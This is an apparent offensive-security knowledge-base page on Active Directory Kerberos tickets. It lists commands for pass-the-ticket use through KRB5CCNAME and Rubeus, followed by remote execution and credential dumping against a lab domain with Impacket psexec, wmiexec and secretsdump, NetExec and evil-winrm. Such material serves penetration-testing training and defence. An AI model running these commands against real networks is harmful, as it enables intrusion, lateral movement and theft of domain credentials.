Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Tickets

Usage

After conversion, we validate the ticket, point tooling at it, and use Kerberos-aware protocols. The two most common usage paths are Linux ccache through KRB5CCNAME and Windows .kirbi injection through Rubeus.

Use a ccache on Linux:

export KRB5CCNAME=FILE:$(pwd)/ticket.ccache
klist -e

LDAP with Kerberos:

ldapsearch -Y GSSAPI -H ldap://dc01.ootw.local -b 'DC=ootw,DC=local' '(objectClass=domain)'

SMB with Kerberos:

smbclient -k //dc01.ootw.local/C$

Impacket with Kerberos:

psexec.py -k -no-pass ootw.local/user@target.ootw.local -dc-ip 10.10.10.200
wmiexec.py -k -no-pass ootw.local/user@target.ootw.local -dc-ip 10.10.10.200
secretsdump.py -k -no-pass ootw.local/user@target.ootw.local -dc-ip 10.10.10.200

NetExec with Kerberos:

nxc smb 10.10.10.200 -d ootw.local -u user -k --use-kcache
nxc ldap 10.10.10.200 -d ootw.local -u user -k --use-kcache

evil-winrm with Kerberos:

evil-winrm -i dc01.ootw.local -r OOTW.LOCAL -k

Inject a .kirbi on Windows:

.\Rubeus.exe ptt /ticket:ticket.kirbi
klist

Describe a ticket with Rubeus:

.\Rubeus.exe describe /ticket:ticket.kirbi

Renew a TGT before it expires:

.\Rubeus.exe renew /ticket:ticket.kirbi /ptt